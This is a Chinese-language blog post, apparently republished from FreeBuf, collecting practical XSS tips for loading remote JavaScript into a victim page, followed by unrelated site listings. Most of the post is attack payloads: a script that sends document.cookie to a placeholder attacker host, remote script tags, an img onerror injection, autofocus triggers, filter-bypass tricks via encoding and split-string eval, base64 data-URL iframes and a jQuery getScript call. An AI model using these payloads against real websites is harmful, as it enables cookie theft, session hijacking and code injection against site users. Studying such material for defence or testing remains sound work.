xss如何加载远程js的一些tips

在早期 , 对于xss我们是这样利用的

<script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script>

将 cookie之类的数据传递到自己的服务端

但是 如果要更为复杂的攻击的话,由于字符串长度等限制 需要加载远程js来实现。

一个简单的例子

<script src=http://xxx.xxx/a.js></script>

这样更为简洁

<script src=//xxx.xxx/a.js></script>

src属性会自己取当前页面的协议。

过滤了 <>的话 有时候可以用 %bf u003cu 等来绕过。

对于可以执行js的属性,我们可以控制其内容的话,可以基于DOM的方法创建和插入节点调用js

<img src=x onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'>

不要忘记 autofocus无须交互即可执行js。

<input autofocus="" onfocus="........" />

过滤了 script ‘ create 等关键字的话。 各种编码绕过即可。 你可以看下jin的这篇文章http://drops.wooyun.org/tips/689

或者用String.fromCharCode 函数转换成 asc码

但是string.fromcharcode 太长了,在同一个页面,可控多个输出的时候, 可以对全局变量 进行多次赋值

一个经典的例子

<script>z='document.'</script><script>z=z+'write("'</script>
<script>z=z+'<script'</script><script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script><script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script><script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script><script>eval_r(z)</script>

我们也可以用data url 来加载。

<object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3h4eC54eHgvYS5qcz48L3NjcmlwdD4=">
</object>
<iframe src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3h4eC54eHgvYS5qcz48L3NjcmlwdD4=">
</iframe>

PHNjcmlwdCBzcmM9aHR0cDovL3h4eC54eHgvYS5qcz48L3NjcmlwdD4= 是

<script src=http://xxx.xxx/a.js></script>

的base64值。

支持data url 的标签还有

<anchor>、<img> <a>(需点击) <meta>.....

需注意的是

<img>

里的 data url 是不允许执行js的。

还有, ie8 以下浏览器是不支持 data url的。IE8 data URL 最大长度限制为32k字节,超出无效。IE9+没有这个限制 ie不支持对

<frame>

标签的src设置data URL

有时候 我们可以直接调用javascript框架的函数 来实现一些功能。

比如, 支持 jquery的话(通过查看源代码,你可以看出是否支持) 我们直接这样调用就可以了

$.getScript("//xxx.xxx/a.js");

实践出真理!

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2014-01-26

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏码洞

求不更学不动之Redis5.0新特性Stream尝鲜

Redis5.0最近被作者突然放出来了,增加了很多新的特色功能。而Redis5.0最大的新特性就是多出了一个数据结构Stream,它是一个新的强大的支持多播的可...

18860
来自专栏java一日一条

40+个对初学者非常有用的PHP技巧(二)

考虑使用ob_gzhandler?不,别这样做。它没有任何意义。PHP应该是来写应用程序的。不要担心PHP中有关如何优化在服务器和浏览器之间传输的数据。

10510
来自专栏专业duilib使用+业余界面开发

mysql5.7 安装,服务启动失败无data目录处理

25530
来自专栏Java技术分享

30天轻松掌握JavaWeb-学习目录

17.使用beanUtils操纵javabean

28560
来自专栏码洞

求不更学不动之Redis5.0新特性Stream尝鲜

Redis5.0最近被作者突然放出来了,增加了很多新的特色功能。而Redis5.0最大的新特性就是多出了一个数据结构Stream,它是一个新的强大的支持多播的可...

22320
来自专栏ytkah

dedecms自增标签[field:global.autoindex/]的运用

  用bootstrap建站时用到幻灯片切换模块,里面有个active(下面代码中的data-slide-to="0"),其余的按顺序递增(1,2),如果用de...

36740
来自专栏北京马哥教育

Python自动化运维之高级函数

一、协程 1.1协程的概念 协程,又称微线程,纤程。英文名Coroutine。一句话说明什么是线程:协程是一种用户态的轻量级线程。(其实并没有说明白~) 那么这...

31160
来自专栏数据和云

性能分析:Oracle的CLOB使用与临时段访问及其性能优化

编辑手记:在系统测试、上线和优化的过程中,抓住核心环节、不放过任何可疑,这是DBA的基本要求之一,在这个案例中,高频度调用的存储过程引起了注意。 客户新上线的一...

54250
来自专栏Java进阶架构师

手把手带你实现JDK动态代理

业务接口Interface、业务实现类target、业务处理类Handler、JVM在内存中生成的动态代理类$Proxy0

8420
来自专栏Java工程师日常干货

纯手写实现JDK动态代理前言JDK动态代理 手写代码实现JDK动态代理

在Java领域,动态代理应用非常广泛,特别是流行的Spring/MyBatis等框架。JDK本身是有实现动态代理技术的,不过要求被代理的类必须实现接口,不过cg...

10520

扫码关注云+社区

领取腾讯云代金券